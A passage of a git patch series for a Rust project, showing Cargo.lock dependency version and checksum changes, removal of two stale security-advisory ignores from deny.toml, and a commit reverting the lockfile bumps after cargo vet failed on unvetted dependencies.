"registry+https://github.com/rust-lang/crates.io-index" -checksum = "2eadbac71025cd7b0834f20d1fe8472e8495821b4e9801eb0a60bd1f19827602" +checksum = "4b572dff8bcf38bad0fa19729c89bb5748b2b9b1d8be70cf90df697e3a8f32aa" dependencies = [ "js-sys", "wasm-bindgen", @@ -6312,9 +6302,9 @@ checksum = "589f6da84c646204747d1270a2a5661ea66ed1cced2631d546fdfb155959f9ec" [[package]] name = "winnow" -version = "1.0.2" +version = "1.0.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "2ee1708bef14716a11bae175f579062d4554d95be2c6829f518df847b7b3fdd0" +checksum = "0592e1c9d151f854e6fd382574c3a0855250e1d9b2f99d9281c6e6391af352f1" [[package]] name = "wit-bindgen" @@ -6493,9 +6483,9 @@ dependencies = [ [[package]] name = "zerofrom" -version = "0.1.7" +version = "0.1.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "69faa1f2a1ea75661980b013019ed6687ed0e83d069bc1114e2cc74c6c04c4df" +checksum = "0ec05a11813ea801ff6d75110ad09cd0824ddba17dfe17128ea0d5f68e6c5272" dependencies = [ "zerofrom-derive", ] diff --git a/deny.toml b/deny.toml index 66b025769..c26ecfc6e 100644 --- a/deny.toml +++ b/deny.toml @@ -37,15 +37,6 @@ ignore = [ # atomic-polyfill: transitive via monty -> postcard -> heapless # Unmaintained but no security vulnerability; upstream dep we can't control "RUSTSEC-2023-0089", - # rand: unsoundness with custom logger using rand::rng() (RUSTSEC-2026-0097) - # Transitive via russh, statrs, proptest, reqwest; we don't use custom loggers - "RUSTSEC-2026-0097", - # rsa: Marvin Attack timing side-channel (RUSTSEC-2023-0071, GHSA-c25x-cm9x-cq9w) - # No patched version published upstream — RustCrypto/RSA#19. Pulled in - # transitively via russh's ssh-key dep. Mirrors the `ignore:` already set - # in .github/workflows/ci.yml for rustsec/audit-check, and is the same - # advisory surfaced as Dependabot moderate alert #27. - "RUSTSEC-2023-0071", ] [bans] From 11b7ae8dda22a5daa6f37f567ea8e030b4d82ac1 Mon Sep 17 00:00:00 2001 From: Mykhailo Chalyi Date: Sun, 17 May 2026 05:32:29 +0000 Subject: [PATCH 7/7] =?UTF-8?q?revert:=20undo=20cargo=20update=20=E2=80=94?= =?UTF-8?q?=20vetting=20blocked,=20defer=20to=20dependabot?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Reverts the lockfile portion of 1fa272b. CI's `cargo vet --locked` fails with 29 unvetted dependencies for the patch bumps, which require trusted-party certification imports that this branch can't perform from the sandbox. Patch bumps will land via dependabot's weekly group PRs (e.g. #1626) which already handle vet certification. The deny.toml cleanup from 1fa272b stays — both `advisory-not-detected` ignores are legitimately stale and the change is unrelated to vetting. --- Cargo.lock | 164 ++++++++++++++++++++++++++++------------------------- 1 file changed, 87 insertions(+), 77 deletions(-) diff --git a/Cargo.lock b/Cargo.lock index 9a1a1517a..8acca4835 100644 --- a/Cargo.lock +++ b/Cargo.lock @@ -304,9 +304,9 @@ checksum = "c08606f8c3cbf4ce6ec8e28fb0014a2c086708fe954eaa885384a6165172e7e8" [[package]] name = "aws-lc-rs" -version = "1.17.0" +version = "1.16.3" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5ec2f1fc3ec205783a5da9a7e6c1509cc69dedf09a1949e412c1e18469326d00" +checksum = "0ec6fb3fe69024a75fa7e1bfb48aa6cf59706a101658ea01bfd33b2b248a038f" dependencies = [ "aws-lc-sys", "untrusted 0.7.1", @@ -315,9 +315,9 @@ dependencies = [ [[package]] name = "aws-lc-sys" -version = "0.41.0" +version = "0.40.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "1a2f9779ce85b93ab6170dd940ad0169b5766ff848247aff13bb788b832fe3f4" +checksum = "f50037ee5e1e41e7b8f9d161680a725bd1626cb6f8c7e901f91f942850852fe7" dependencies = [ "cc", "cmake", @@ -702,9 +702,9 @@ dependencies = [ [[package]] name = "cc" -version = "1.2.62" +version = "1.2.61" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "a1dce859f0832a7d088c4f1119888ab94ef4b5d6795d1ce05afb7fe159d79f98" +checksum = "d16d90359e986641506914ba71350897565610e87ce0ad9e6f28569db3dd5c6d" dependencies = [ "find-msvc-tools", "jobserver", @@ -1172,9 +1172,9 @@ dependencies = [ [[package]] name = "ctor" -version = "1.0.6" +version = "0.11.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "6d765eb1c0bda10d31e0ea185f5ee15da532d60b0912d2bd1441783439e749c5" +checksum = "400a21f1014a968ec518c7ccdf9b4a4ed0cac8c56ccb6d604f8b91f00110501e" [[package]] name = "ctr" @@ -1229,7 +1229,7 @@ dependencies = [ "cfg-if", "cpufeatures 0.2.17", "curve25519-dalek-derive", - "digest 0.11.3", + "digest 0.11.2", "fiat-crypto 0.3.0", "rustc_version", "subtle", @@ -1316,9 +1316,9 @@ dependencies = [ [[package]] name = "digest" -version = "0.11.3" +version = "0.11.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f1dd6dbb5841937940781866fa1281a1ff7bd3bf827091440879f9994983d5c2" +checksum = "4850db49bf08e663084f7fb5c87d202ef91a3907271aff24a94eb97ff039153c" dependencies = [ "block-buffer 0.12.0", "const-oid 0.10.2", @@ -1362,10 +1362,10 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "91bbdd377139884fafcad8dc43a760a3e1e681aa26db910257fa6535b70e1829" dependencies = [ "der 0.8.0", - "digest 0.11.3", + "digest 0.11.2", "elliptic-curve", "rfc6979", - "signature 3.0.0", + "signature 3.0.0-rc.10", "spki 0.8.0-rc.4", "zeroize", ] @@ -1387,7 +1387,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "c6e914c7c52decb085cea910552e24c63ac019e3ab8bf001ff736da9a9d9d890" dependencies = [ "pkcs8 0.11.0-rc.11", - "signature 3.0.0", + "signature 3.0.0-rc.10", ] [[package]] @@ -1416,7 +1416,7 @@ dependencies = [ "rand_core 0.10.1", "serde", "sha2 0.11.0", - "signature 3.0.0", + "signature 3.0.0-rc.10", "subtle", "zeroize", ] @@ -1436,7 +1436,7 @@ dependencies = [ "base16ct", "crypto-bigint", "crypto-common 0.2.1", - "digest 0.11.3", + "digest 0.11.2", "hkdf", "hybrid-array", "once_cell", @@ -1891,9 +1891,9 @@ dependencies = [ [[package]] name = "hashbrown" -version = "0.17.1" +version = "0.17.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "ed5909b6e89a2db4456e54cd5f673791d7eca6732202bbf2a9cc504fe2f9b84a" +checksum = "4f467dd6dccf739c208452f8014c75c18bb8301b050ad1cfb27153803edb0f51" [[package]] name = "heapless" @@ -1963,7 +1963,7 @@ version = "0.13.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "6303bc9732ae41b04cb554b844a762b4115a61bfaa81e3e83050991eeb56863f" dependencies = [ - "digest 0.11.3", + "digest 0.11.2", ] [[package]] @@ -2016,9 +2016,9 @@ checksum = "6dbf3de79e51f3d586ab4cb9d5c3e2c14aa28ed23d180cf89b4df0454a69cc87" [[package]] name = "hybrid-array" -version = "0.4.12" +version = "0.4.11" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "9155a582abd142abc056962c29e3ce5ff2ad5469f4246b537ed42c5deba857da" +checksum = "08d46837a0ed51fe95bd3b05de33cd64a1ee88fc797477ca48446872504507c5" dependencies = [ "ctutils", "subtle", @@ -2224,7 +2224,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "d466e9454f08e4a911e14806c24e16fba1b4c121d1ea474396f396069cf949d9" dependencies = [ "equivalent", - "hashbrown 0.17.1", + "hashbrown 0.17.0", "serde", "serde_core", ] @@ -2283,7 +2283,7 @@ dependencies = [ "sec1", "sha1 0.11.0", "sha2 0.11.0", - "signature 3.0.0", + "signature 3.0.0-rc.10", "ssh-cipher", "ssh-encoding", "subtle", @@ -2323,6 +2323,16 @@ version = "2.12.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "d98f6fed1fde3f8c21bc40a1abb88dd75e67924f9cffc3ef95607bad8017f8e2" +[[package]] +name = "iri-string" +version = "0.7.12" +source = "registry+https://github.com/rust-lang/crates.io-index" +checksum = "25e659a4bb38e810ebc252e53b5814ff908a8c58c2a9ce2fae1bbec24cbf4e20" +dependencies = [ + "memchr", + "serde", +] + [[package]] name = "is-macro" version = "0.3.7" @@ -2529,9 +2539,9 @@ dependencies = [ [[package]] name = "js-sys" -version = "0.3.98" +version = "0.3.97" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "67df7112613f8bfd9150013a0314e196f4800d3201ae742489d999db2f979f08" +checksum = "a1840c94c045fbcf8ba2812c95db44499f7c64910a912551aaaa541decebcacf" dependencies = [ "cfg-if", "futures-util", @@ -2730,7 +2740,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "69b6441f590336821bb897fb28fc622898ccceb1d6cea3fde5ea86b090c4de98" dependencies = [ "cfg-if", - "digest 0.11.3", + "digest 0.11.2", ] [[package]] @@ -2812,9 +2822,9 @@ dependencies = [ [[package]] name = "module-lattice" -version = "0.2.3" +version = "0.2.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0c61b87c9683ab7cb1c6871d261ad5479b6b10ceb52c4352aaca3b5d35a8febe" +checksum = "dc7c90d33a0dac244570c26461d761ffaeadb3bfc2b17cc625ae2185cafdffae" dependencies = [ "ctutils", "hybrid-array", @@ -2852,9 +2862,9 @@ dependencies = [ [[package]] name = "napi" -version = "3.9.0" +version = "3.8.6" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "f1d395473824516f38dd1071a1a37bc57daa7be65b293ebba4ead5f7abb017a2" +checksum = "8e55037284865448ecf329baa86a4d05401f647ebde99f5747b640d32c2c5226" dependencies = [ "bitflags", "ctor", @@ -2868,15 +2878,15 @@ dependencies = [ [[package]] name = "napi-build" -version = "2.3.2" +version = "2.3.1" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c9c366d2c8c60b86fa632df75f745509b52f9128f91a6bad4c796e44abb505e1" +checksum = "d376940fd5b723c6893cd1ee3f33abbfd86acb1cd1ec079f3ab04a2a3bc4d3b1" [[package]] name = "napi-derive" -version = "3.5.6" +version = "3.5.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "89b3f766e04667e6da0e181e2da4f85475d5a6513b7cf6a80bea184e224a5b42" +checksum = "a4ba740fe4c9524d86fd90798fd8ccdb23402b3eef7e7c30897a8a369b529fcf" dependencies = [ "convert_case", "ctor", @@ -2919,9 +2929,9 @@ dependencies = [ [[package]] name = "nix" -version = "0.31.3" +version = "0.31.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "cf20d2fde8ff38632c426f1165ed7436270b44f199fc55284c38276f9db47c3d" +checksum = "5d6d0705320c1e6ba1d912b5e37cf18071b6c2e9b7fa8215a1e8a7651966f5d3" dependencies = [ "bitflags", "cfg-if", @@ -3309,9 +3319,9 @@ dependencies = [ [[package]] name = "pack1" -version = "1.1.0" +version = "1.0.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "e3b7bb0ecf2e447b1f20ee94ee79ef6eed1e9d4b3c36ce1903b9dea3bf205523" +checksum = "d6e7cd9bd638dc2c831519a0caa1c006cab771a92b1303403a8322773c5b72d6" dependencies = [ "bytemuck", ] @@ -3412,7 +3422,7 @@ version = "0.13.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "112d82ceb8c5bf524d9af484d4e4970c9fd5a0cc15ba14ad93dccd28873b0629" dependencies = [ - "digest 0.11.3", + "digest 0.11.2", "hmac 0.13.0", ] @@ -4179,9 +4189,9 @@ dependencies = [ [[package]] name = "rfc6979" -version = "0.5.0" +version = "0.5.0-rc.5" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "5236ce872cac07e0fb3969b0cbf468c7d2f37d432f1b627dcb7b8d34563fb0c3" +checksum = "23a3127ee32baec36af75b4107082d9bd823501ec14a4e016be4b6b37faa74ae" dependencies = [ "hmac 0.13.0", "subtle", @@ -4220,12 +4230,12 @@ dependencies = [ "const-oid 0.10.2", "crypto-bigint", "crypto-primes", - "digest 0.11.3", + "digest 0.11.2", "pkcs1", "pkcs8 0.11.0-rc.11", "rand_core 0.10.1", "sha2 0.11.0", - "signature 3.0.0", + "signature 3.0.0-rc.10", "spki 0.8.0-rc.4", "zeroize", ] @@ -4307,9 +4317,9 @@ dependencies = [ [[package]] name = "russh" -version = "0.60.3" +version = "0.60.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "324b92f459d3e42da294e14e8eb150d2215fcfb7c966838bc1127cd68bc05a0d" +checksum = "9c9e358980fe9b079b99da387117864ee6f0a3fd02f39e5b5fde6af9c2895374" dependencies = [ "aead 0.6.0-rc.10", "aes 0.8.4", @@ -4376,7 +4386,7 @@ dependencies = [ "sha2 0.10.9", "sha2 0.11.0", "sha3", - "signature 3.0.0", + "signature 3.0.0-rc.10", "spki 0.8.0-rc.4", "ssh-encoding", "subtle", @@ -4389,9 +4399,9 @@ dependencies = [ [[package]] name = "russh-cryptovec" -version = "0.60.3" +version = "0.59.0" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "37cb4d0360bdd8935392a306d8b5edb539cc455b30e8bf13dd213a0cf7879b40" +checksum = "36140e8a20297bc2e8338807c3d9ca911f7fa49d7539cbcd6d48d3befd70efd8" dependencies = [ "log", "nix", @@ -4801,9 +4811,9 @@ dependencies = [ [[package]] name = "serdect" -version = "0.4.3" +version = "0.4.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "66cf8fedced2fcf12406bcb34223dffb92eaf34908ede12fed414c82b7f00b3e" +checksum = "9af4a3e75ebd5599b30d4de5768e00b5095d518a79fefc3ecbaf77e665d1ec06" dependencies = [ "base16ct", "serde", @@ -4854,7 +4864,7 @@ checksum = "aacc4cc499359472b4abe1bf11d0b12e688af9a805fa5e3016f9a386dc2d0214" dependencies = [ "cfg-if", "cpufeatures 0.3.0", - "digest 0.11.3", + "digest 0.11.2", ] [[package]] @@ -4882,7 +4892,7 @@ checksum = "446ba717509524cb3f22f17ecc096f10f4822d76ab5c0b9822c5f9c284e825f4" dependencies = [ "cfg-if", "cpufeatures 0.3.0", - "digest 0.11.3", + "digest 0.11.2", ] [[package]] @@ -4891,7 +4901,7 @@ version = "0.11.0" source = "registry+https://github.com/rust-lang/crates.io-index" checksum = "be176f1a57ce4e3d31c1a166222d9768de5954f811601fb7ca06fc8203905ce1" dependencies = [ - "digest 0.11.3", + "digest 0.11.2", "keccak", ] @@ -4961,11 +4971,11 @@ dependencies = [ [[package]] name = "signature" -version = "3.0.0" +version = "3.0.0-rc.10" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "28d567dcbaf0049cb8ac2608a76cd95ff9e4412e1899d389ee400918ca7537f5" +checksum = "7f1880df446116126965eeec169136b2e0251dba37c6223bcc819569550edea3" dependencies = [ - "digest 0.11.3", + "digest 0.11.2", "rand_core 0.10.1", ] @@ -5008,9 +5018,9 @@ dependencies = [ [[package]] name = "siphasher" -version = "1.0.3" +version = "1.0.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8ee5873ec9cce0195efcb7a4e9507a04cd49aec9c83d0389df45b1ef7ba2e649" +checksum = "b2aa850e253778c88a04c3d7323b043aeda9d3e30d5971937c1855769763678e" [[package]] name = "slab" @@ -5507,20 +5517,20 @@ dependencies = [ [[package]] name = "tower-http" -version = "0.6.10" +version = "0.6.8" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "68d6fdd9f81c2819c9a8b0e0cd91660e7746a8e6ea2ba7c6b2b057985f6bcb51" +checksum = "d4e6559d53cc268e5031cd8429d05415bc4cb4aefc4aa5d6cc35fbf5b924a1f8" dependencies = [ "bitflags", "bytes", "futures-util", "http", "http-body", + "iri-string", "pin-project-lite", "tower", "tower-layer", "tower-service", - "url", ] [[package]] @@ -5958,9 +5968,9 @@ dependencies = [ [[package]] name = "wasm-bindgen" -version = "0.2.121" +version = "0.2.120" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "49ace1d07c165b0864824eee619580c4689389afa9dc9ed3a4c75040d82e6790" +checksum = "df52b6d9b87e0c74c9edfa1eb2d9bf85e5d63515474513aa50fa181b3c4f5db1" dependencies = [ "cfg-if", "once_cell", @@ -5971,9 +5981,9 @@ dependencies = [ [[package]] name = "wasm-bindgen-futures" -version = "0.4.71" +version = "0.4.70" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "96492d0d3ffba25305a7dc88720d250b1401d7edca02cc3bcd50633b424673b8" +checksum = "af934872acec734c2d80e6617bbb5ff4f12b052dd8e6332b0817bce889516084" dependencies = [ "js-sys", "wasm-bindgen", @@ -5981,9 +5991,9 @@ dependencies = [ [[package]] name = "wasm-bindgen-macro" -version = "0.2.121" +version = "0.2.120" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "8e68e6f4afd367a562002c05637acb8578ff2dea1943df76afb9e83d177c8578" +checksum = "78b1041f495fb322e64aca85f5756b2172e35cd459376e67f2a6c9dffcedb103" dependencies = [ "quote", "wasm-bindgen-macro-support", @@ -5991,9 +6001,9 @@ dependencies = [ [[package]] name = "wasm-bindgen-macro-support" -version = "0.2.121" +version = "0.2.120" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "d95a9ec35c64b2a7cb35d3fead40c4238d0940c86d107136999567a4703259f2" +checksum = "9dcd0ff20416988a18ac686d4d4d0f6aae9ebf08a389ff5d29012b05af2a1b41" dependencies = [ "bumpalo", "proc-macro2", @@ -6004,9 +6014,9 @@ dependencies = [ [[package]] name = "wasm-bindgen-shared" -version = "0.2.121" +version = "0.2.120" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "c4e0100b01e9f0d03189a92b96772a1fb998639d981193d7dbab487302513441" +checksum = "49757b3c82ebf16c57d69365a142940b384176c24df52a087fb748e2085359ea" dependencies = [ "unicode-ident", ] @@ -6060,9 +6070,9 @@ dependencies = [ [[package]] name = "web-sys" -version = "0.3.98" +version = "0.3.97" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "4b572dff8bcf38bad0fa19729c89bb5748b2b9b1d8be70cf90df697e3a8f32aa" +checksum = "2eadbac71025cd7b0834f20d1fe8472e8495821b4e9801eb0a60bd1f19827602" dependencies = [ "js-sys", "wasm-bindgen", @@ -6302,9 +6312,9 @@ checksum = "589f6da84c646204747d1270a2a5661ea66ed1cced2631d546fdfb155959f9ec" [[package]] name = "winnow" -version = "1.0.3" +version = "1.0.2" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0592e1c9d151f854e6fd382574c3a0855250e1d9b2f99d9281c6e6391af352f1" +checksum = "2ee1708bef14716a11bae175f579062d4554d95be2c6829f518df847b7b3fdd0" [[package]] name = "wit-bindgen" @@ -6483,9 +6493,9 @@ dependencies = [ [[package]] name = "zerofrom" -version = "0.1.8" +version = "0.1.7" source = "registry+https://github.com/rust-lang/crates.io-index" -checksum = "0ec05a11813ea801ff6d75110ad09cd0824ddba17dfe17128ea0d5f68e6c5272" +checksum = "69faa1f2a1ea75661980b013019ed6687ed0e83d069bc1114e2cc74c6c04c4df" dependencies = [ "zerofrom-derive", ]